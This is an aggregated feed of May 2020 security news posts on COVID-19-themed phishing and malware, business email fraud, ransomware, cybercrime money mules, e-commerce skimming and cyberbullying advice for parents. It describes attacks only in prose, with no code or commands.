As most of the UK’s cybersecurity workforce now sits at home isolated while carrying out an already pressurised job, there is every possibility that this could be affecting their mental health. In light of Mental Health Awareness Week, and as the discussion around employee wellbeing becomes louder and louder amidst the COVID-19 pandemic, we spoke with five cybersecurity experts to get their thoughts on how organisations can minimise the negative mental and physical impacts on … More

The post Mental Health Awareness Week: Coping with cybersecurity pressures amidst a global pandemic appeared first on Help Net Security.

International Fraud Ring Stealing Unemployment Funds

Several state governments have been targeted by a sophisticated fraud campaign that has likely siphoned millions of dollars in unemployment payments earmarked for the record number of Americans seeking benefits as a result of the pandemic, a new Secret Service memo warns.

According to an internal memo, a group of Nigeria-based criminals have been filing phony unemployment claims in multiple states using a personally identifying information (PII), specifically stolen or compromised Social Security numbers. The information being used was most likely procured through various forms of identity theft and/or known data breaches and compromises.

“It is assumed the fraud ring behind this possesses a substantial PII database to submit the volume of applications observed thus far,” stated the memo

The fraud campaign comes in the wake of a massive increase in unemployment as a result of the Covid-19 pandemic. State unemployment offices are vulnerable to this kind of fraud as they scramble to get funds to Americans in need as quickly as possible.

The Secret Service has identified Washington as the primary target of the fraud campaign, but has seen “evidence of attacks in North Carolina, Massachusetts, Rhode Island, Oklahoma, Wyoming, and Florida,” according to the memo. 

The post International Fraud Ring Stealing Unemployment Funds appeared first on Adam Levin.

Security and the rapidly growing importance of mobile apps

Organizations are under more pressure than ever before to rapidly produce both new apps and updates to existing apps, not only because it’s essentially the only way they can interact with their customers, but also because there will be a flood of new users who previously relied on physical locations to conduct their business. Continuous mobile development is now more critical than ever, and organizations must provide error-free, engaging user experiences. In the rush to … More

The post Security and the rapidly growing importance of mobile apps appeared first on Help Net Security.

Is Your Child Being Cyberbullied? What Parents Need to Know

cyberbullying

In this season of social distancing, teens need their friends more than ever. Daily digital connection — through texting, video chat, social networks, and gaming — is critical to keeping friend groups strong. But could increased time online these days lead to an increase in cyberbullying?

While there isn’t data to answer that question definitively, it wouldn’t be surprising for parents to notice some signs of conflict surface as the months continue to creep by. And, with re-open dates for schools in limbo, it’s more important than ever to keep the family safety conversation humming.

For clarity: Allowing more screen time doesn’t mean more cyberbullying or conflict is certain to occur. However, experience has taught us that more screen time does increase the potential for digital conflict.

Social and Emotional Fallout

This unprecedented health event hasn’t been easy on anyone, but kids especially are likely to be holding onto some big emotions about it. A recent Common Sense Media study confirms that social media has been key to helping kids get through this crisis, but one in four kids surveyed feels “more lonely than usual.”

The school year with its milestones — proms, graduations, dates, parties — ended abruptly. It’s logical to assume these losses have sparked feelings of sadness, anger, frustration, and anxiety. And because online is where most kids connect with peers, these emotions can easily play out there in the form of aggressive behavior, conflict, or persistent drama.

Digital Awareness

cyberbullying

So how do you know if your child is being cyberbullied or dealing with conflict online? It isn’t always easy simply because so many kids won’t admit to being bullied. Often they believe telling an adult will make the harassment worse. They may feel ashamed or embarrassed about a regretful situation or the fact that they’re being targeted in the first place. For that reason, one of the best ways to help your child is to be aware of the time they spend online, the people they connect with, and how those digital circles impact their wellbeing.

What to Look For

The many forms of cyberbullying continue to evolve alongside the digital culture. Here are just a few ways kids bully one another.

 

  • Saying hurtful or intimidating things to someone on social media, a text, or email.
  • Making negative comments about a person’s sexuality, race, religion, handicaps, or physical features.
  • Camouflaging hurtful or threatening comments with words like “jk” (just joking).
  • Asking online friends to vote for or against another person, with Instagram polls or captions such as “Is this person hot or not?” or “Would you go out with this person?”
  • Posting or sharing with others the private photos, memes, emails, texts, or secrets without the permission of another person.
  • Intentionally posting unflattering or embarrassing photos of another person.
  • Spreading rumors or false information about another person online.
  • Making any threat to another person no matter how harmless you think it may be.

Signs of Cyberbullying

If your child is getting bullied online, there are some potential signs.

  • Anxious or upset after reading a text, frequently gets sick or nauseous, declines invitations from friends, or bows out of fun family outings.
  • Trouble sleeping or being withdrawn or moody.
  • Being protective of his or her phone, deleting or deactivating social networks
  • Sudden loss of a steady friend group or sudden complaining about once-loved friends.
  • Loss of interest in favorite sports or hobbies or a decline in grades.
  • References to suicide, loneliness, and hopelessness (when severe bullying is taking place).

Know Where They Go

Another way to understand your child’s emotional connection to his or her digital communities is to learn about their favorite platforms and monitor them. Pay specific attention to the tone of his or her social threads. And, if you see concerning comments or posts, ask your child how you can help. If your child is using risky apps such as WhatsApp or Kik, that allows people to use the app anonymously, discuss your concerns with your child. Some social networks are more conducive to cyberbullying than others.

Monitor Gaming Communities

Gaming time can skyrocket during the summer, and when games get competitive, cyberbullying can happen. Spend time with your child while he or she is gaming. Listen to the tone of the conversations and be aware of your child’s demeanor. For your child’s physical and emotional health, make every effort to set gaming limits as summer approaches.

Parenting Moves to Avoid

Bullying experts will tell you that what you don’t do if your child is getting bullied is often as important as what you do. Here’s some insight:

1) Never advise a child to ignore the bullying. 2) Never blame a child for being bullied even if he or she did something to aggravate the bullying. No one deserves to be bullied. 3) As angry as you feel that someone is bullying your child, do not encourage your child to fight back physically. 4) Don’t overreact; escalate accordingly. If you can identify the bully, consider talking with the child’s parents. 5) Don’t lead the charge. Give your child veto power over your involvement. If they say they don’t want you to get involved (unless you suspect physical danger or suicide), respect that. 6) If the bullying continues to escalate, report it, seek help from school counselors or the police if necessary. 7) Even if you are fearful, don’t take your child’s digital devices away. He or she didn’t do anything wrong.

Online Resources

A number of organizations are leading the charge against cyberbullying and have fantastic resources for families. Here are just a few: Cyberbullying Research CenterStopBullying.govStompOutBullying.orgKindCampaign.comItGetsBetter.orgNational Bullying Prevention Center. If you’d like your organization added to this list, please leave a comment.

We hope you and your family are staying healthy these days and finding some time to talk about online safety. If you need a refresher, read Part I and Part II of our Online Safety Basics series. And, if you’re looking for a fun school lesson for the day, you can always quiz your kids on any of McAfee’s Family Safety content!

The post Is Your Child Being Cyberbullied? What Parents Need to Know appeared first on McAfee Blogs.

Microsoft is open-sourcing COVID-19 threat intelligence

Microsoft has recently announced that it has made some of its COVID-19 threat intelligence open-source. 

While the number of Coronavirus-themed attacks continues to increase increased Microsoft announced it is open-sourcing its COVID-19 threat intelligence to help organizations to repeal these threats.

“Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack.” reads a post published by Microsoft. “Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions. “

Sharing information could offer the community a more complete view of attackers’ tactics, techniques, and procedures.

Microsoft experts have already been sharing examples of malicious lures and have provided guided hunting of COVID-themed attacks through Azure Sentinel Notebooks.

COVID malspam

Microsoft is going to publicly release some of its threat indicators, the company pointed out that its users are already protected against these attacks by Microsoft Threat Protection (MTP).

Microsoft has made available the indicators both in the Azure Sentinel GitHub repo, and through the Microsoft Graph Security API.

“These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.” continues Microsoft.

“This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.”

This is just the beginning of the threat intelligence sharing of Coronavirus-related IOCs that will be offered through the peak of the outbreak.

Microsoft is releasing file hash indicators related to malicious email attachments employed in the campaigns. 

Azure Sentinel customers can import the indicators using a Playbook or access them directly from queries. Microsoft added that both Office 365 ATP and Microsoft Defender ATP already block the attacks associated with the above indicators.

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post Microsoft is open-sourcing COVID-19 threat intelligence appeared first on Security Affairs.

QNodeService Trojan spreads via fake COVID-19 tax relief

Experts spotted a new malware dubbed QNodeService that was involved in Coronavirus-themed phishing campaign, crooks promise victims COVID-19 tax relief.

Researchers uncovered a new malware dubbed QNodeService that was employed in a Coronavirus-themed phishing campaign. The operators behind the campaign use COVID-19 lure promising victims tax relief.

The phishing messages use Trojan sample associated with a file named “Company PLP_Tax relief due to Covid-19 outbreak CI+PL.jar,” experts from MalwareHunterTeam noticed that the malicious code was only detected by ESET AV.

The QNodeService Trojan is written in Node.js and is delivered through a Java downloader embedded in the .jar file, Trend Micro warns. 

“Running this file led to the download of a new, undetected malware sample written in Node.js; this trojan is dubbed as “QNodeService”.” reads the analysis published by Trend Micro.

“The use of Node.js is an unusual choice for malware authors writing commodity malware, as it is primarily designed for web server development, and would not be pre-installed on machines likely to be targeted. However, the use of an uncommon platform may have helped evade detection by antivirus software.”

QNodeService is able to perform a broad range of activities, such as download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management. The malware can also steal system information including IP address and location, download additional malware payloads, and exfiltrate stolen data. The actual malware only targets Windows systems, but experts believe that developers are working to make it a cross-platform threat.

The Java downloader is obfuscated via Allatori in the bait document, the malware downloads the Node.js malware file (either “qnodejs-win32-ia32.js” or “qnodejs-win32-x64.js”) and a file called “wizard.js.” 

Either a 32-bit or 64-bit version of Node.js is dropped depending on the Windows system architecture of the target machine. 

The wizard.js file is an obfuscated Javascript (Node.js) file used to acheve persistence by creating a “Run” registry key entry and for downloading another malicious payload.

One of the most interesting feature implemented by the QNodeService malware is the support for an “http-forward” command, which allows attackers to download files without directly connecting to a victim’s PC. 

“Of particular note is the http-forward command, which allows an attacker to download a file without directly connecting to the victim machine, as shown below in figures 13-16.” continues Trend Micro. “However, a valid request path and access token are required to access files on the machine. The C&C server must first send “file-manager/forward-access” to generate the URL and access token to use for the http-forward command later.”

Trend Micro researchers included Indicators of Compromise (IoCs) in their report.

Unfortunately, Coronavirus-themed attacks continue to target individuals, businesses, and organizations worldwide.

At the end of March, experts from IBM X-Force uncovered a hacking campaign employing the Zeus Sphinx malware that focused on government relief payment.

Operators were spreading it in a spam campaign aimed at stealing victims’ financial information, the spam messages sent to the victims claim to provide information related to the Coronavirus outbreak and government relief payments

Researchers revealed that the malware is receiving constant upgrades to improve its capabilities. 

Pierluigi Paganini

(SecurityAffairs – Coronavirus, hacking)

The post QNodeService Trojan spreads via fake COVID-19 tax relief appeared first on Security Affairs.

Criminals boost their schemes with COVID-19 themed phishing templates

Phishers are incessantly pumping out COVID-19 themed phishing campaigns and refining the malicious pages the targets are directed to. “Credential phishing attackers often tailor their email lures with themes they believe will be the most effective and use general websites for actual credential harvesting. The recent move to create custom COVID-19 payment phishing templates indicates that buyers view them as effective enough to warrant custom tactics to harvest credentials,” Proofpoint researchers have noted. The COVID-19 … More

The post Criminals boost their schemes with COVID-19 themed phishing templates appeared first on Help Net Security.

COVID-19 online fraud trends: Industries, schemes and targets

The telecommunications, retail and financial services industries have been increasingly impacted by COVID-19 online fraud, according to TransUnion. From a consumer perspective, Millennials have been most targeted by fraudsters using COVID-19 scams. Overall, the percent of suspected fraudulent digital transactions rose 5% from March 11 to April 28 when compared to Jan. 1 to March 10, 2020. More than 100 million risky transactions from March 11 to April 28 have been identified. “Given the billions … More

The post COVID-19 online fraud trends: Industries, schemes and targets appeared first on Help Net Security.

Educational organizations use cloud apps to share sensitive data outside of IT control

Many educational organizations are at risk of data security incidents during the current period of working from home and virtual learning, a Netwrix report reveals. Weak data security controls According to the survey, even before the COVID-19 pandemic, the majority of educational organizations had weak data security controls. In particular, 54% of IT professionals in the educational sector confessed that employees put data at risk by sharing it via cloud apps outside of IT knowledge. … More

The post Educational organizations use cloud apps to share sensitive data outside of IT control appeared first on Help Net Security.

Crooks stole $10 million from Norway’s state investment fund Norfund

Norway’s state investment fund, Norfund, suffered a business email compromise (BEC) attack, hackers stole $10 million.

Hackers stole $10 million from Norway’s state investment fund, Norfund, in a business email compromise (BEC) attack.

Norfund is a private equity company established by the Norwegian Storting (parliament) in 1997 and owned by the Norwegian Ministry of Foreign Affairs. The fund receives its investment capital from the state budget.

The fraudsters compromised the Norfund email system and monitored communications between the employees of the fund and their partners for months.

Once identified the employee that responsible for money transfers. the attackers created a Norfund email address to impersonate an individual authorized to transfer large sums of money through the bank Norfund.

In a classic BEC scheme, hackers replaced the payment information provided to the partners to hijack the transfer to an account under their control in a bank in Mexico.

“Through an advance data breach, the defrauders were able to access information concerning a loan of USD 10 million (approx. 100 million NOK) from Norfund to a microfinance institution in Cambodia.” reads a notice published by Norfund.

“The defrauders manipulated and falsified information exchange between Norfund and the borrowing institution over time in a way that was realistic in structure, content and use of language. Documents and payment details were falsified”

Norfund was not able to block the fraudulent wire transfer because the attackers managed to delay of its discovery.

The BEC attack took place on March 16, but it was discovered more than a month later, on April 30 when the fraudsters attempted to carry out a new fraud, that was detected and blocked.

To delay the discovery of the scam, the attacker sent an email to the Cambodian beneficiary informing it of a delay due to the current Coronavirus lockdown in Norway.

“This is a grave incident. The fraud clearly shows that we, as an international investor and development organisation, through active use of digital channels are vulnerable. The fact that this has happened shows that our systems and routines are not good enough. We have taken immediate and serious action to correct this” said company CEO, Tellef Thorleifsson.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

The post Crooks stole $10 million from Norway’s state investment fund Norfund appeared first on Security Affairs.

China-linked hackers are attempting to steal COVID-19 Vaccine Research

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal COVID-19 vaccine research.

US authorities warned healthcare and scientific researchers that China-linked hackers were attempting to steal research related to treatments and vaccines for COVID-19.

“The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are issuing this announcement to raise awareness of the threat to COVID-19-related research. The FBI is investigating the targeting and compromise of U.S. organizations conducting COVID-19-related research by PRC-affiliated cyber actors and non-traditional collectors.” reads the joint alert. “These actors have been observed attempting to identify and illicitly obtain valuable intellectual property (IP) and public health data related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.”

“The F.B.I. and the Department of Homeland Security are preparing to issue a warning that China’s most skilled hackers and spies are working to steal American research in the crash effort to develop vaccines and treatments for the coronavirus. The efforts are part of a surge in cybertheft and attacks by nations seeking advantage in the pandemic.” reported The New York Times.

“These actors have been observed attempting to identify and illicitly obtain valuable intellectual property and public health data related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research,” reads a statement from the FBI and the CISA.

“China’s efforts to target these sectors pose a significant threat to our nations response to COVID-19”.

The US agencies recommend targeted organizations to adopt cybersecurity best practices to prevent state-sponsored hackers from stealing COVID-19-related material.

“What else is new with China? What else is new? Tell me. I’m not happy with China.” President Trump commented. “We’re watching it very closely,”.

“China’s long history of bad behavior in cyberspace is well documented, so it shouldn’t surprise anyone they are going after the critical organizations involved in the nation’s response to the Covid-19 pandemic,” said Christopher Krebs, the director of the Cybersecurity and Infrastructure Security Agency. He added that the agency would “defend our interests aggressively.”

The Chinese Government rejected the allegation Beijing on Monday.

“We are leading the world in COVID-19 treatment and vaccine research. It is immoral to target China with rumors and slanders in the absence of any evidence,” Foreign Affairs ministry spokesman Zhao Lijian said.

The Chinese government is not the only one interested in COVID-19 research, nation-state hackers from Russia, Iran, and North Korea are launching spear-phishing and misinformation campaigns in the attempt to target organizations and scientists involved in the vaccine research.

Last week the US and the UK issued a joint alert to warn of the rise in cyber attacks carried out by foreign states against healthcare organizations and researchers.

This is my interview on the topic at TRT World

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post China-linked hackers are attempting to steal COVID-19 Vaccine Research appeared first on Security Affairs.

Magellan Health Ransomware Attack Exposes Customer Data

In the wake of an April ransomware attack, Fortune 500 healthcare company Magellan Health announced that a hacker exfiltrated customer data.

The ransomware attack was first detected by Magellan Health April 11, 2020, and was traced back to a phishing email that had been sent and opened five days earlier. Subsequent investigation revealed that customer data had been exfiltrated prior to the deployment of the ransomware.

“The exfiltrated records include personal information such as name, address, employee ID number, and W-2 or 1099 details such as Social Security number or Taxpayer ID number and, in limited circumstances, may also include usernames and passwords,” stated the company in a letter sent to affected individuals.

This incident comes months after the company announced several of its subsidiaries had been targeted by phishing attacks that resulted in the compromise of the health information of more than 55,000 members.

 

The post Magellan Health Ransomware Attack Exposes Customer Data appeared first on Adam Levin.

Smashing Security #178: Office pranks, meat dresses, and robocop dogs

Graham shares stories of email storms, Carole describes the steps being taken by firms as they try to coax employees back to the office, and special guest Lisa Forte details a hack that has impacted Lady Gaga and other celebrities.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast with computer security veterans Graham Cluley and Carole Theriault.

Crooks continues to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

Microsoft has discovered a new COVID-19 themed phishing campaign targeting businesses with the LokiBot Trojan.

Lokibot was already employed in Coronavirus-themed campaigns, early of April, security experts at FortiGuard Labs discovered phishing attacks using alleged messages from the World Health Organization (WHO) to deliver the LokiBot trojan.

COVID-19 themed phishing campaigns recently observed by Microsoft was using messages with subject lines like “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020.”

The LokiBot data stealer is able to collect information from tens of different web browsers, access to browsing data, locate the credentials for more than 15 different email and file transfer clients, and check for the presence of popular remote admin tools like SSH, VNC and RDP.

One of the phishing campaigns observed by Microsoft sees attackers pretending to be from the Centers for Disease Control (CDC), the messages promise latest information on the COVID-19 pandemic and a new “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020”.

Another campaign use messages that pretend to be from a vendor asking for updated banking information to process payments due to the COVID-19 virus lockdown.

The emails in both campaigns use ARJ attachments that contain malicious executables disguised as PDF files.

The choice of password-protected ARJ files aims at bypassing some security solutions. Upon opening the enclosed files, the infection process will start to finally deliver the LokiBot Trojan.

Microsoft pointed out that its Microsoft Threat Protection’s machine learning algorithms were able to detect the campaign, Microsoft users are automatically protected by the Microsoft Defender.

“Microsoft Defender’s advanced detection technologies, including behavior learning and machine learning, started blocking this attack right away. We used deeper analysis of the blocked attacks, which helped us to identify the end-to-end campaign detailed,” Tanmay Ganacharya, director of security research of Microsoft Threat Protection, told BleepingComputer.

“We see a lot of benefits of leveraging machine learning and we are in a very unique position here at Microsoft because of the quality and diversity of our 8.2 trillion signals we process daily through the Microsoft Intelligent Security Graph.” 

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Crooks continues to use COVID-19 lures, Microsoft warns appeared first on Security Affairs.

COVID-19 Scam Roundup – May 11, 2020

Digital attacks continue to exploit coronavirus 2019 (COVID-19) as part of their malicious operations. On May 5, 2020, the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) along with the United Kingdom’s National Cyber Security Centre (NCSC) published a joint alert in which they revealed that they had witnessed APT actors targeting […]… Read More

The post COVID-19 Scam Roundup – May 11, 2020 appeared first on The State of Security.

Maze Ransomware Targets the Hospitals and Labs Fighting Coronavirus

“Never let a good crisis go to waste.” These wise words have been recently attributed to former Bill Clinton Chief of Staff Rahm Emanuel, though Freakonomics actually dates it back to 1976 and a completely different context. Regardless of who first uttered the phrase or some permutation of it, modern-day cybercriminals have taken the candid […]… Read More

The post Maze Ransomware Targets the Hospitals and Labs Fighting Coronavirus appeared first on The State of Security.

COVID-19 Scam Roundup – May 4, 2020

Malicious actors continue to abuse coronavirus 2019 (COVID-19) as a lure to profit off of innocent people. Indeed, Arkose Labs found that 26.5% of all transactions recorded in Q1 2020 were fraud and abuse attempts—a 20% increase over the previous quarter and the highest attack rate ever observed by the security firm’s researchers. It’s therefore […]… Read More

The post COVID-19 Scam Roundup – May 4, 2020 appeared first on The State of Security.

Cybercriminals Are Exploiting the Covid-19 Pandemic

Cybercriminals are actively targeting Covid-19 hotspots with malware and phishing campaigns, according to a new report from Bitdefender.

The report, “Coronavirus-themed Threat Reports Haven’t Flattened the Curve,” shows a direct correlation between confirmed Covid-19 cases and malware attacks exploiting the crisis.

These findings confirm a similar report that showed a 30000% increase in Covid-19-themed attacks from January to March.

“Countries that have reported the largest number of Coronavirus-themed [scams] seem to have also been those hit hardest by the pandemic,” the report stated, showing a concurrent increase in both confirmed cases and malware attacks in South Africa in April as an example.

Data from the Bitdefender report also indicated a connection between an increase in phishing campaigns in areas where testing for Covid-19 has become available.

“[W]e can safely infer that people who get tested are interested in learning more about potential treatments, medicine, medical best practices, and maybe even other patient’s experiences… those spending more time online looking for information about COVID-19 are more likely to fall prey to scams and malware related to Coronavirus,” the report stated. “Receiving an email claiming to have new and interesting information about the pandemic with more exclusive information embedded within the attachment is the perfect lure.”

Read the full report here.

The post Cybercriminals Are Exploiting the Covid-19 Pandemic appeared first on Adam Levin.

How Cybercriminals are Weathering COVID-19

In many ways, the COVID-19 pandemic has been a boon to cybercriminals: With unprecedented numbers of people working from home and anxious for news about the virus outbreak, it’s hard to imagine a more target-rich environment for phishers, scammers and malware purveyors. In addition, many crooks are finding the outbreak has helped them better market their cybercriminal wares and services. But it’s not all good news: The Coronavirus also has driven up costs and disrupted key supply lines for many cybercriminals. Here’s a look at how they’re adjusting to these new realities.

FUELED BY MULES

One of the more common and perennial cybercriminal schemes is “reshipping fraud,” wherein crooks buy pricey consumer goods online using stolen credit card data and then enlist others to help them collect or resell the merchandise.

Most online retailers years ago stopped shipping to regions of the world most frequently associated with credit card fraud, including Eastern Europe, North Africa, and Russia. These restrictions have created a burgeoning underground market for reshipping scams, which rely on willing or unwitting residents in the United States and Europe — derisively referred to as “reshipping mules” — to receive and relay high-dollar stolen goods to crooks living in the embargoed areas.

A screen shot from a user account at “Snowden,” a long-running reshipping mule service.

But apparently a number of criminal reshipping services are reporting difficulties due to the increased wait time when calling FedEx or UPS (to divert carded goods that merchants end up shipping to the cardholder’s address instead of to the mule’s). In response, these operations are raising their prices and warning of longer shipping times, which in turn could hamper the activities of other actors who depend on those services.

That’s according to Intel 471, a cyber intelligence company that closely monitors hundreds of online crime forums. In a report published today, the company said since late March 2020 it has observed several crooks complaining about COVID-19 interfering with the daily activities of their various money mules (people hired to help launder the proceeds of cybercrime).

“One Russian-speaking actor running a fraud network complained about their subordinates (“money mules”) in Italy, Spain and other countries being unable to withdraw funds, since they currently were afraid to leave their homes,” Intel 471 observed. “Also some actors have reported that banks’ customer-support lines are being overloaded, making it difficult for fraudsters to call them for social-engineering activities (such as changing account ownership, raising withdrawal limits, etc).”

Still, every dark cloud has a silver lining: Intel 471 noted many cybercriminals appear optimistic that the impending global economic recession (and resultant unemployment) “will make it easier to recruit low-level accomplices such as money mules.”

Alex Holden, founder and CTO of Hold Security, agreed. He said while the Coronavirus has forced reshipping operators to make painful shifts in several parts of their business, the overall market for available mules has never looked brighter.

“Reshipping is way up right now, but there are some complications,” he said.

For example, reshipping scams have over the years become easier for both reshipping mule operators and the mules themselves. Many reshipping mules are understandably concerned about receiving stolen goods at their home and risking a visit from the local police. But increasingly, mules have been instructed to retrieve carded items from third-party locations.

“The mules don’t have to receive stolen goods directly at home anymore,” Holden said. “They can pick them up at Walgreens, Hotel lobbies, etc. There are a ton of reshipment tricks out there.”

But many of those tricks got broken with the emergence of COVID-19 and social distancing norms. In response, more mule recruiters are asking their hires to do things like reselling goods shipped to their homes on platforms like eBay and Amazon.

“Reshipping definitely has become more complicated,” Holden said. “Not every mule will run 10 times a day to the post office, and some will let the goods sit by the mailbox for days. But on the whole, mules are more compliant these days.”

GIVE AND TAKE

KrebsOnSecurity recently came to a similar conclusion: Last month’s story, “Coronavirus Widens the Money Mule Pool,” looked at one money mule operation that had ensnared dozens of mules with phony job offers in a very short period of time. Incidentally, the fake charity behind that scheme — which promised to raise money for Coronavirus victims — has since closed up shop and apparently re-branded itself as the Tessaris Foundation.

Charitable cybercriminal endeavors were the subject of a report released this week by cyber intel firm Digital Shadows, which looked at various ways computer crooks are promoting themselves and their hacking services using COVID-19 themed discounts and giveaways.

Like many commercials on television these days, such offers obliquely or directly reference the economic hardships wrought by the virus outbreak as a way of connecting on an emotional level with potential customers.

“The illusion of philanthropy recedes further when you consider the benefits to the threat actors giving away goods and services,” the report notes. “These donors receive a massive boost to their reputation on the forum. In the future, they may be perceived as individuals willing to contribute to forum life, and the giveaways help establish a track record of credibility.”

Brian’s Club — one of the underground’s largest bazaars for selling stolen credit card data and one that has misappropriated this author’s likeness and name in its advertising — recently began offering “pandemic support” in the form of discounts for its most loyal customers.

It stands to reason that the virus outbreak might depress cybercriminal demand for “dumps,” or stolen account data that can be used to create physical counterfeit credit cards. After all, dumps are mainly used to buy high-priced items from electronics stores and other outlets that may not even be open now thanks to the widespread closures from the pandemic.

If that were the case, we’d also expect to see dumps prices fall significantly across the cybercrime economy. But so far, those price changes simply haven’t materialized, says Gemini Advisory, a New York based company that monitors the sale of stolen credit card data across dozens of stores in the cybercrime underground.

Stas Alforov, Gemini’s director of research and development, said there’s been no notable dramatic changes in pricing for both dumps and card data stolen from online merchants (a.k.a. “CVVs”) — even though many cybercrime groups appear to be massively shifting their operations toward targeting online merchants and their customers.

“Usually, the huge spikes upward or downward during a short period is reflected by a large addition of cheap records that drive the median price change,” Alforov said, referring to the small and temporary price deviations depicted in the graph above.

Intel 471 said it came to a similar conclusion.

“You might have thought carding activity, to include support aspects such as checker services, would decrease due to both the global lockdown and threat actors being infected with COVID-19,” the company said. “We’ve even seen some actors suggest as much across some shops, but the reality is there have been no observations of major changes.”

CONSCIENCE VS. COMMERCE

Interestingly, the Coronavirus appears to have prompted discussion on a topic that seldom comes up in cybercrime communities — i.e., the moral and ethical ramifications of their work. Specifically, there seems to be much talk these days about the potential karmic consequences of cashing in on the misery wrought by a global pandemic.

For example, Digital Shadows said some have started to question the morality of targeting healthcare providers, or collecting funds in the name of Coronavirus causes and then pocketing the money.

“One post on the gated Russian-language cybercriminal forum Korovka laid bare the question of threat actors’ moral obligation,” the company wrote. “A user initiated a thread to canvass opinion on the feasibility of faking a charitable cause and collecting donations. They added that while they recognized that such a plan was ‘cruel,’ they found themselves in an ‘extremely difficult financial situation.’ Responses to the proposal were mixed, with one forum user calling the plan ‘amoral,’ and another pointing out that cybercrime is inherently an immoral affair.”

What E-Commerce Sites Can Learn from the Covid-19 Pandemic

For the last few years, cybersecurity experts have been sounding the alarm on something called e-skimming. In this kind of attack, hackers intercept payment card data and personal information from e-commerce sites by exploiting the architectural complexity of those e-commerce sites. 

While there have been several major breaches that were the result of e-skimming, including Macy’s and British Airways, the bulk of these hacking campaigns have been attributed to an individual or a group of hackers called Magecart. S/he or they usually target the Magento platform, often by injecting rogue code into outdated plugins and extensions for websites.

Magento isn’t the Covid moment here. E-skimming is. 

Enter WooCommerce 

Security researchers discovered what could be a game changer in e-skimming attacks earlier this month, one that exponentially expands our collective attackable surface.

Magento has about a 12% market share and represents less than 1% of the entire assemblage of code that comprises the Internet. 

The discovery I mentioned is that a new e-skimming hack has been targeting WooCommerce, which is a far more ubiquitous online shopping plugin used in 26% of all e-commerce sites. WooCommerce is native to and powered by WordPress, a platform that represents over 35% of websites currently online. It would be hard to find a larger attackable surface on the Internet.

The threat posed by a hack targeting WooCommerce isn’t bad only because of the technology’s ubiquity. The issue has to do with who uses it. The quick answer is: Anyone. Contrast that with Magento, which is designed for enterprise-level sites that have detailed inventory needs and other layers of complexity. Magento requires installation, development, and maintenance by trained web professionals certified by the company to understand its many nuances. 

WooCommerce, on the other hand, is easy to use and install; a user with little to no experience building websites—and even less knowledge of cybersecurity best practices—can use it to get an e-commerce site up and running with ease. 

This would be a bad situation in normal times, but with the Covid-19 pandemic making many businesses more reliant on e-commerce and virtual transactions, the potential for an increase in poorly secured websites built on the fly is a matter for concern. 

That said, the bigger issue may be the nature of the hack itself. While e-skimming attacks have usually involved the compromise of vulnerable third-party software, e-skimming injects malicious code into the core source code of WooCommerce which makes it much harder to detect–particularly for non-expert site builders.

“With credit card swipers it’s common for attackers to simply include/append malicious javascript from a third-party website,” said Sucuri researcher Ben Martin, who first wrote about the attack. “The fact that the malware lodged itself within an already existing and legitimate file makes it a bit harder to detect.”

There are parallels with the early days of the Covid-19 pandemic. A relatively familiar threat has surfaced in a more dangerous form that is harder to detect and has the potential to impact a significantly larger number of victims. 

Like Covid-19 in January, the current WooCommerce hack is a nascent threat, but unlike the virus, you can prepare for the threat and mitigate the potential damage. 

A good place to start is for businesses and consumers to use a system I call the 3 Ms:

Minimize the Threat: Businesses doing e-commerce need to keep their website and security software up-to-date. Those companies that have the technical know-how should run regular scans for the presence of rogue code on their websites. If they don’t have that resource in house, they would be well advised to hire a cybersecurity expert to do it for them. Most important is to practice good data hygiene, especially when relying on a remote workforce. A single login and password hooked by a phishing email could provide hackers with the necessary credentials to compromise a website, as well as its customer and payment data. 

When making payments online, consumers should use credit cards instead of debit/bank cards, which can provide hackers a direct conduit to their bank accounts.

Monitor Accounts: Keep track of your bank and credit card accounts to know as quickly as possible when something isn’t right. The most effective way to do this is to sign up for transaction monitoring—offered for free by banks, credit unions and credit card companies— which notifies you of any activity in your credit or bank accounts.

Manage the Damage: If a business falls prey to an e-skimming campaign, it’s crucial to act as quickly as possible to alert the authorities, notify consumers and identify the source of the hack. Customers affected by an e-skimming breach should immediately contact their payment card companies, request new cards, and lock down any potentially impacted accounts.

Malware and viruses are opportunistic. With more businesses relying on e-commerce to make up for shuttered physical storefronts, newly remote workers struggling to secure their home offices from cyberthreats, and more customers using e-tailers for their day-to-day shopping, the circumstances are ideal for a new strain of malware to spread. 

The post What E-Commerce Sites Can Learn from the Covid-19 Pandemic appeared first on Adam Levin.

Unproven Coronavirus Therapy Proves Cash Cow for Shadow Pharmacies

Many of the same shadowy organizations that pay people to promote male erectile dysfunction drugs via spam and hacked websites recently have enjoyed a surge in demand for medicines used to fight malaria, lupus and arthritis, thanks largely to unfounded suggestions that these therapies can help combat the COVID-19 pandemic.

A review of the sales figures from some of the top pharmacy affiliate programs suggests sales of drugs containing hydroxychloroquine rivaled that of their primary product — generic Viagra and Cialis — and that this as-yet-unproven Coronavirus treatment accounted for as much as 25 to 30 percent of all sales over the past month.

A Google Trends graph depicting the incidence of Web searches for “chloroquine” over the past 90 days.

